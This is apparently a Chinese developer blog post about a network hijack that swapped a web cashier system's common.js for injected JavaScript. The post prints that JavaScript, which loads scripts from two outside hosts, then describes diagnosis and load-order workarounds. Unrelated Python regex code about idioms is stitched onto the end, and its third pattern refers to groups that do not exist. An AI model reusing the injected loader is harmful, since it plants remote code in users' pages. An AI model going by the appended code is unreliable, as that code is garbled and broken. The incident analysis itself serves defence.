com组件 的劫持_偷天换日:网络劫持,网页js被伪装替换。

偷天换日

3月12号石家庄一个客户(后面简称乙方)有几家门店,平台收银(web)有一些功能无法正常使用,平台有上千家门店在使用,到目前为止别的省份都没有此问题。远程协助发现,js日期控件无法正常调用,报js错误。日期插件用的是my97datepicker,用了这么久也没见出过什么问题。

浏览器查看页面加载的js,发现页面本身加载的js中有重复的(随机重复),一个是common.js还有个common.js?145001231。代码中只有common.js。点开common.js?145001231发现代码没问题。再查看common.js。代码如下

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17try {

if (!document.getElementById("mck0")) {

var s0 ="http://xxx.xd618.com/resources/js/common.js?" +new Date().getTime(),

s1 ="http://8.525cm.com/v2/v.php?id=01";

var ar =new Array(2);

ar[0] = s0;

ar[1] = s1;

var h = document.getElementsByTagName('head').item(0);

for (var i = 0; i < 2; ++i) {

var sc = document.createElement("script");

sc.type ="text/javascript";

sc.id ="mck" + i;

sc.src = ar[i];

h.appendChild(sc);

}

}

}catch(e) {}

看到这就应该明白为什么会有common.js和common.js?145001231。

问题找到了,怎么来的呢,先想到的是乙方操作系统有问题或内网arp欺骗。电话询问客户网络环境,得知这几个门店距离很远,不是在一起;而且每个门店使用的宽带都是单独开通的。电脑系统都是统一安装的。让乙方到隔壁店铺登录下试试,乙方找了隔壁的电脑登录后,远程协助,发现也有这个问题。(难道是运营商那边dns挟持的,感觉不太可能)

这时候已经过去3,4个小时了,好几个门店的收银,和后台进销存无法正常使用。客户那边的经理打电话来,说找了台笔记本,用他们自己的wifi就有这个问题,用移动的4g网络就没问题。那就是网络有问题了,乙方也认同了。当时由于手上还有其他任务要忙,就暂时搁置了。

3月30今天又得知江西南昌有个客服也遇到了同样的问题,发现问题一模一样。一家还能说是个例,第二家的出现需要将问题等级提高了,虽然不是平台的问题,但对于客户来说没法正常使用,必须要解决。

应对方案

1、分析代码。反其道而行,想移除添加的js。

后来发现思路有点偏,替换的代码是直接添加一个script元素,平台中页面加载js是用document.write(),替换的js影响了原有页面的js加载顺序导致功能无法正常使用。试着在页面js文件引用改为xxx.js?123,试了下没问题了,又尝试改为xxx.js?,发现也可以,临时这么解决,把出问题的几个页面js引用修改了下。(此问题改过观察中)

2、浏览器插件。(这个是下策)

后续思考

问题并没有真正解决,但是可以通过一些方法解决替换js后所带来的加载顺序问题。

可以尝试用

多js打包(还能减少服务器连接次数,提高性能,也要留意下IE和Firefox对同一域名进行请求的并发连接数限制),增加版本号。

js模块化加载(requireJS类组件)。

使用子模式编号的程序: import re text = '''行尸走肉、金蝉脱壳、百里挑一、金玉满堂、 背水一战、霸王别姬、天上人间、不吐不快、海阔天空、 情非得已、满腹经纶、兵临城下、春暖花开、插翅难逃、 黄道吉日、天下无双、偷天换日、两小无猜、卧虎藏龙、 珠光宝气、簪缨世族、花花公子、绘声绘影、国色天香、 相亲相爱、八仙过海、金玉良缘、掌上明珠、皆大欢喜、 浩浩荡荡、平平安安、秀秀气气、斯斯文文、高兴高兴''' # ABAC形式的词语 pattern_1 = re.compile(r'(\w)(\w)\1(\w)') print(pattern_1.findall(text)) # AABB形式的词语 pattern_2 = re.compile(r'(\w)(\w)\2\1') print(pattern_2.findall(text)) # ABAB形式的词语 pattern_3 = re.compile(r'(\w)(\w)\3\2') print(pattern_3.findall(text)) 使用子模式命名的程序: import re text = '''行尸走肉、金蝉脱壳、百里挑一、金玉满堂、 背水一战、霸王别姬、天上人间、不吐不快、海阔天空、 情非得已、满腹经纶、兵临城下、春暖花开、插翅难逃、 黄道吉日、天下无双、偷天换日、两小无猜、卧虎藏龙、 珠光宝气、簪缨世族、花花公子、绘声绘影、国色天香、 相亲相爱、八仙过海、金玉良缘、掌上明珠、皆大欢喜、 浩浩荡荡、平平安安、秀秀气气、斯斯文文、高兴高兴''' # ABAC形式的词语 pattern_1 = re.compile(r'(?P<x>\w)(?P<y>\w)(?P=x)(?P<z>\w)') print(pattern_1.findall(text)) # AABB形式的词语 pattern_2 = re.compile(r'(?P<x>\w)(?P<y>\w)(?P=y)(?P=x)') print(pattern_2.findall(text)) # ABAB形式的词语 pattern_3 = re.compile(r'(?P<x>\w)(?P<y>\w)(?P=z)(?P=y)') print(pattern_3.findall(text))
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值